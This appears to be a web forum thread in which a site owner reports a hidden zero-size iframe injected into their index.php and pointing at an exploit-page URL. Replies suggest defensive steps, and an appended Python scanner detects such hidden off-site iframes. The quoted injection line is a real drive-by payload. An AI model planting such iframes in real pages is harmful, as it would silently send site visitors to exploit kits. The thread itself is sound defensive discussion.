Code injection into PHP.

Just found out that someone had apparently attacked one of my old sites I created years ago by injecting this into index.php:

Code:
<iframe src = "http://ddoser-crack.info/sploit/index.php" height=0 width=0></iframe>

How can I prevent this happening again? It looks like they have used something to modify the header in the file.
 
Ask your hosting provider to tell you who has been logged into FTP. It's possible the password has been compromised. This could be through phishing, packet sniffing or a trojan on your PC.

Check any open source scripts (forums, blogs, e-commerce, etc) are fully up to date with all the latest security patches. A vulnerability in one of these would allow an attacker to execute their code or write to files. If the index.php is part of a CMS, it's possible that CMS has been compromised and the template edited.

Check for any unsecured file manager/WYSIWYG editor type scripts on your webspace. Obviously anything you've coded yourself should avoid using user input (POST/GET/SESSION vars) in any file operations. Where this is unavoidable, validation should be very strict. You should never use user input in eval().

One of these is bound to be the culprit :).
 
You will need to identify the source of the injection, i.e. locate the vulnerability. I would suggest changing all passwords; don't use FTP if you can help it, use SFTP instead.

If it's a big web application, run it through an auditing tool like Nikto or Skipfish, and make sure the actual web server is well patched. There are numerous ways the iframes could have been injected, so it's hard to say with precision how to fix it.

I would also recommend running Apache with the mod_security module, http://www.owasp.org/index.php/Category:OWASP_ModSecurity_Core_Rule_Set_Project
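
To check whether other files in the webroot carry the same kind of hidden iframe shown in the first post, here is a scanner added as an example; it is not code from any poster in this thread. The extension list, the `own_hosts` parameter and the `SAMPLE` page are assumptions constructed for illustration.

```python
import re
from pathlib import Path
from urllib.parse import urlparse

# Extensions worth scanning in a PHP webroot (assumption; extend as needed).
SCAN_EXT = {".php", ".html", ".htm", ".inc", ".tpl", ".js"}
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")

# Constructed sample: one hidden off-site iframe and one visible embed.
SAMPLE = ('<?php echo "hi"; ?>\n'
          '<iframe src = "http://injected.example/x.php" height=0 width=0></iframe>\n'
          '<iframe src="https://video.example/embed" width="560" height="315"></iframe>\n')

def parse_attrs(tag):
    """Return the tag's attributes as a dict with lower-cased names."""
    return {m.group(1).lower(): next(g for g in m.groups()[1:] if g is not None)
            for m in ATTR_RE.finditer(tag)}

def is_hidden(attrs):
    """True when the iframe is sized or styled so a visitor cannot see it."""
    tiny = lambda v: v is not None and re.fullmatch(r"[01](px)?", v.strip(), re.I)
    style = attrs.get("style", "").replace(" ", "").lower()
    return bool(tiny(attrs.get("width")) or tiny(attrs.get("height"))
                or "display:none" in style or "visibility:hidden" in style)

def suspicious_iframes(text, own_hosts=()):
    """Yield (line_no, tag) for hidden iframes whose src points off-site."""
    for m in IFRAME_RE.finditer(text):
        attrs = parse_attrs(m.group(0))
        host = (urlparse(attrs.get("src", "")).hostname or "").lower()
        if host and host not in own_hosts and is_hidden(attrs):
            yield text.count("\n", 0, m.start()) + 1, m.group(0)

def scan_webroot(root, own_hosts=()):
    """Walk root and return [(path, line_no, tag)] for every suspicious iframe."""
    hits = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in SCAN_EXT:
            text = path.read_text(encoding="utf-8", errors="replace")
            hits += [(str(path), n, t) for n, t in suspicious_iframes(text, own_hosts)]
    return hits

if __name__ == "__main__":
    import sys
    for path, line_no, tag in scan_webroot(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{path}:{line_no}: {tag}")
```

A hit shows where injected markup landed, not how it got there, so the FTP log and patch checks suggested in the replies still apply.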
 